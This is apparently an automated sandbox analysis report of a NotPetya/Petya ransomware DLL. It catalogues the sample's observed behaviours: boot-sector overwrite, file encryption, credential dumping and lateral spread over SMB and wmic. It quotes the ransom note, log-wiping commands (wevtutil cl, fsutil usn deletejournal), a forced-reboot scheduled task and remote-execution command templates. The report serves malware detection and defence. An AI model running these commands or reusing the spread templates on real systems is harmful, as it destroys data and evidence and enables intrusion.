
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 309071
Start time: 22:05:09
Joe Sandbox Product: Cloud
Start date: 12.07.2017
Overall analysis duration: 0h 10m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: abc.dll
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection: MAL
Classification: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 90
  • Number of non-executed functions: 56
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20 are automatically reduced to 1
  • Found application associated with file extension: .dll
Warnings:
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | malicious


Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false


Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview



Operating System Destruction:

Contains functionality to access PhysicalDrive, possible boot sector overwrite
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8CBF CreateFileA on filename \\.\PhysicalDrive0 | 1_2_011E8CBF

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree | 1_2_011E1BA0
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree | 1_2_011E1E51
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext | 1_2_011E1424
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle | 1_2_011E189A
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree | 1_2_011E1C7F
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam | 1_2_011E1B4E

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree | 1_2_011E1BA0
Clears the journal log
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknown | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Clears the windows event log
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Writes a notice file (html or txt) to demand a ransom
Source: C:\Windows\System32\rundll32.exeFile dropped: C:\README.TXT -> decryption service.we guarantee that you can recover all your files safely and easily.all you need to do is submit the payment and purchase the decryption key.please follow the instructions:1.send $300 worth of bitcoin to following address:1mz7153hmuxxtur2r1t78mgsdzaatnbbwx2.send your bitcoin wallet id and personal installation key to e-mail wowsmith123456@posteo.net.your personal installation key:aqiaaa5maaaapaaa++tyrumu+pfr/pqcpalhiajbcixd9om3nuqcxjh6gytiieggdriojyg0vc3ymlm0vm6dnuflp+ctfnhgemd286p6c9ooj4wewgzdnu+wphrgkgpuu75f2gqvetpqbyvpofidq0lfuixrlh9p/l7j2eox+b37pkl9gajy9ft9r7kxavoqvxni68rj7dmyrfytyy2amm10uvp8astgukmm0atzd7puxmbjenkjo/b3xomooqjxgevmikux9eacs2hhfjqata0pkd+/p8onhb4lllk1zyqudtralmi0s+ci4+yh+f3h0bzzwv0bd/dsk83/sjelc+iprfxtm6kcvqnfpa==
Petya / NotPetya detected (based on Eternalblue SMBv1 Shellcode pattern)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E3CA0 | 1_2_011E3CA0

Exploits:

Contains functionality to create an SMB header
Source: C:\Windows\System32\rundll32.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 1_2_011E2466
Connects to many different private IPs (likely to spread or exploit)
Source: global traffic | TCP traffic: 192.168.1.16:445
Source: global traffic | TCP traffic: 192.168.1.1:139
Source: global traffic | TCP traffic: 192.168.1.0:139
Source: global traffic | TCP traffic: 192.168.1.2:80
Source: global traffic | TCP traffic: 192.168.1.13:445
Connects to many different private IPs via SMB (likely to spread or exploit)
Source: global traffic | TCP traffic: 192.168.1.16:445
Source: global traffic | TCP traffic: 192.168.1.1:139
Source: global traffic | TCP traffic: 192.168.1.0:139
Source: global traffic | TCP traffic: 192.168.1.2:445
Source: global traffic | TCP traffic: 192.168.1.13:445

Networking:

Contains functionality to download additional files from the internet
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E67AF memset,select,recv,htons,recv | 1_2_011E67AF
Urls found in memory or binary data
Source: rundll32.exe | String found in binary or memory: http://192.168.1.2/7

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Windows\System32\rundll32.exe | Code function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive | 1_2_011E1038
Source: C:\Windows\System32\rundll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive0 | 1_2_011E8CBF
Infects the boot sector of the hard disk
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: 0 (4 identical entries)
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11

Stealing of Sensitive Information:

Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\rundll32.exe | Directory queried: number of queries: 1011
Contains functionality to dump credential hashes (LSA Dump)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress | 5_2_00F62143
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress | 5_1_00F62143

Persistence and Installation Behavior:

Creates license or readme file
Source: C:\Windows\System32\rundll32.exe | File created: C:\README.TXT
Drops PE files
Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\dllhost.dat
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\dllhost.dat
May use bcdedit to modify the Windows boot settings
Source: loaddll32.exe | Binary or memory string: 03<bcdedit.exe`
Contains functionality to infect the boot sector
Source: C:\Windows\System32\rundll32.exe | Code function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive | 1_2_011E1038
Source: C:\Windows\System32\rundll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive0 | 1_2_011E8CBF
Infects the boot sector of the hard disk
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: 0 (4 identical entries)
Writes directly to the primary disk partition (DR0)
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: unknown length: 512 (4 identical entries)

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect | 1_2_011E9367
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\Windows\System32\rundll32.exe | Code execution: Found new code
PE file contains an invalid checksum
Source: F915.tmp.2724.dr | Static PE information: real checksum: 0x18550 should be: 0x23f50
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65955 push ecx; ret | 5_2_00F65968
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F65955 push ecx; ret | 5_1_00F65968
Contains functionality to check for running processes (XOR)
Source: C:\Windows\System32\rundll32.exe | Code function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 1_2_011E8677

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose | 1_2_011E1973
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} (2 identical entries)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 (4 identical entries)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file system
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\rundll32.exe | Directory queried: number of queries: 1011
Contains functionality to enumerate network shares of other devices
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$ | 1_2_011E9987
Contains functionality to spread via wmic.exe
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E98AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError | 1_2_011E98AB

System Summary:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: abc.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wdigest.pdb source: F915.tmp
Source: Binary string: wdigest.pdbJ6 source: F915.tmp
Binary contains paths to development resources
Source: rundll32.exe, abc.dllBinary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
Classification label
Source: classification engine | Classification label: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E81BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError | 1_2_011E81BA
Contains functionality to enum processes or threads
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 1_2_011E8677
Contains functionality to load and extract PE file embedded resources
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E85D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree | 1_2_011E85D0
Creates temporary files
Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
PE file has an executable .text section and no other executable section
Source: abc.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Runs a DLL by calling functions
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Spawns processes
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknown | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: unknown | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\schtasks.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: abc.dll | Static PE information: Section: .rsrc ZLIB complexity 0.999495577221
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx | 1_2_011E7DEB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree | 5_2_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb | 5_2_00F61D5F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree | 5_1_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb | 5_1_00F61D5F
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8D5A CreateFileA,DeviceIoControl,LocalAlloc,SetFilePointer,WriteFile,LocalFree,CloseHandle | 1_2_011E8D5A
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError | 1_2_011E9987
Contains functionality to shutdown / reboot the system
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx | 1_2_011E7DEB
Creates files inside the system directory
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\abc
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe | Process token adjusted: Security
PE file contains executable resources (Code or Archives)
Source: dllhost.dat.2724.dr | Static PE information: Resource name: BINRES type: ump; PE32 executable for MS Windows (console) Intel 80386 32-bit
PE file has an invalid certificate
Source: abc.dll | Static PE information: invalid certificate
Reads the hosts file
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (10 identical entries)
Contains functionality to create processes via WMI
Source: rundll32.exeBinary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%ws
Performs an instant shutdown (NtRaiseHardError)
Source: C:\Windows\System32\rundll32.exe | Hard error raised: shutdown

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle | 1_2_011E73FD
May try to detect the Windows Explorer process (often used for injection)
Source: rundll32.exe | Binary or memory string: Progman
Source: rundll32.exe | Binary or memory string: Program Manager
Source: rundll32.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F64CD8 SetUnhandledExceptionFilter | 5_2_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_00F64AB6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F64CD8 SetUnhandledExceptionFilter | 5_1_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_1_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_1_00F64AB6
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\rundll32.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_00F65F8E
Contains functionality to dynamically determine API calls
